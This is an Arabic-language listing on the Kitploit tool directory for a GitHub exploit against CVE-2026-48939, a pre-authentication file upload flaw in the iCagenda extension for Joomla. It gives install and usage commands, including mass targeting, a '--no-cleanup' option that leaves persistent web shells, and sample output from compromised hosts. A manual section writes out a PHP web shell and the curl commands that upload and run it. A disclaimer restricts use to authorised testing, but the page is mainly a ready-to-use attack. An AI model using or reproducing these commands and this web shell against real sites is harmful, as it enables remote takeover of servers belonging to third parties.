Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-48939 — استغلال RCE لرفع ملفات تعسفية قبل المصادقة لإضافة iCagenda في Joomla < 4.0.8 (CVSS 10.0) | Kitploit
أدوات/GitHubGitHub/shinthink/cve-2026-48939
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubshinthink/cve-2026-48939

CVE-2026-48939

استغلال RCE لرفع ملفات تعسفية قبل المصادقة لإضافة iCagenda في Joomla < 4.0.8 (CVSS 10.0)

عرض المستودع
2منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-48939 — استغلال RCE في iCagenda لمنصة Joomla

رفع ملفات عشوائي قبل المصادقة → تنفيذ كود PHP


نظرة عامة

CVE-2026-48939 هي ثغرة حرجة بتقييم CVSS 10.0 في إضافة تقويم الأحداث iCagenda لمنصة Joomla. تفرض ميزة إرفاق الملفات في نموذج تسجيل الأحداث بالواجهة الأمامية ضوابط الوصول على مستوى طبقة العرض فقط — وليس على مستوى المتحكم — مما يسمح برفع الملفات دون مصادقة ودون أي تحقق من الامتداد.

تُخزَّن الملفات المرفوعة مباشرةً تحت الجذر الرئيسي لموقع الويب في المسار /images/icagenda/frontend/attachments/ وتكون قابلة للتنفيذ فورًا كـ PHP.

الإصدارات المتأثرة

إصدار iCagendaالحالة
3.2.1 – 3.9.14قابلة للاستغلال
4.0.0 – 4.0.7قابلة للاستغلال
3.9.15 / 4.0.8+مُصحَّحة

آلية الثغرة

السبب الجذري

يعالج المتحكم registration.submit عمليات رفع الملفات دون فرض تقييد الوصول "المسجلون فقط" المُعدّ في إعدادات المكوّن. تُكتب الملفات المرفوعة بامتدادها الأصلي دون أي قائمة مسموحات أو فحص لنوع MIME أو تحقق من المحتوى.

root@kitploit:~
View Layer   → "Registered Only" enforced (attempts to block)
Controller   → No auth check whatsoever (trivially bypassed by POST)
File Handler → No extension allowlist, no MIME check, no content scan
Destination  → Web-accessible directory → PHP executes directly

تسلسل الهجوم

root@kitploit:~
POST /index.php?option=com_icagenda&task=registration.submit
  jform[attachment] = shell.php  →  saved to /images/icagenda/frontend/attachments/

GET /images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id
  → PHP executed → RCE

التثبيت

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-48939.git
cd CVE-2026-48939
pip install -r requirements.txt

الاستخدام

root@kitploit:~
# Single target
python cve_2026_48939.py -t target.com

# Mass exploit
python cve_2026_48939.py -f targets.txt

# Persistent shell (no cleanup)
python cve_2026_48939.py -t target.com --no-cleanup

# Save results
python cve_2026_48939.py -f targets.txt -o rce.txt

الوسائط

root@kitploit:~
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  -o, --output      Save RCE results to file
  --threads         Concurrent workers (default: 25)
  --no-cleanup      Leave shells on target
  -v, --verbose     Show detailed output

إثبات المفهوم

الاستغلال

root@kitploit:~
$ python cve_2026_48939.py -t target.com -v
root@kitploit:~
  CVE-2026-48939 — iCagenda Joomla RCE Exploit
  CVSS 10.0 | Pre-Auth | File Upload → RCE

    [+] POST registration.submit (jform[attachment]): HTTP 200
    [+] Shell: https://target.com/images/icagenda/frontend/attachments/ic_a3f2b9c1.php

  Host     : target.com
  iCagenda : YES v4.0.5
  Vuln     : YES
  RCE      : YES
  Shell    : https://target.com/images/icagenda/frontend/attachments/ic_a3f2b9c1.php
  Output   : uid=1001(www-data) gid=1001(www-data) groups=1001(www-data)
  Time     : 3.2s

مخرجات الاستغلال الجماعي

root@kitploit:~
  CVE-2026-48939 iCagenda RCE Exploit
  Targets: 500 | Threads: 25 | Cleanup: ON
  -------------------------------------------------------

  [RCE]  target-1.com     v4.0.5    3.2s
         uid=1001(www-data) gid=1001(www-data)
  [RCE]  target-2.com     v3.9.12   4.1s
         uid=33(www-data) gid=33(www-data)

  -------------------------------------------------------
  Total: 500 | iCagenda: 23 | RCE: 8
  -------------------------------------------------------

الاستغلال اليدوي

الخطوة 1 — رفع قشرة ويب PHP

root@kitploit:~
cat > shell.php << 'EOF'
<?php echo "OK|".php_uname(); system($_GET["c"]); ?>
EOF

curl -sk -X POST \
  -F "title=Event" \
  -F "jform[attachment][email protected];type=application/x-php" \
  "https://target.com/index.php?option=com_icagenda&task=registration.submit"

الخطوة 2 — تنفيذ الأوامر

root@kitploit:~
curl -sk "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?c=id"

إخلاء المسؤولية

لأغراض التعليم والاختبار المصرح به فقط.

هذا البرنامج مخصص لمتخصصي الأمن الذين يجرون اختبارات اختراق مصرحًا بها، وللمؤسسات التي تدقق بنيتها التحتية الخاصة، وللباحثين الذين يدرسون استغلال الثغرات الأمنية.

الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني وقد ينتهك:

  • الولايات المتحدة: قانون الاحتيال وإساءة استخدام الحاسوب (18 U.S.C. 1030)
  • إندونيسيا: UU ITE المواد 30 و46
  • الاتحاد الأوروبي: التوجيه 2013/40/EU
  • المملكة المتحدة: قانون إساءة استخدام الحاسوب لعام 1990

لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام.


المراجع

الموردالرابط
تنبيه IONIXionix.io/threat-center/cve-2026-48939
مدخل NVDCVE-2026-48939
سجل تغييرات iCagendaicagenda.com/docs

هذا المشروع غير تابع لـ iCagenda أو Joomlic.

تنزيل الأداة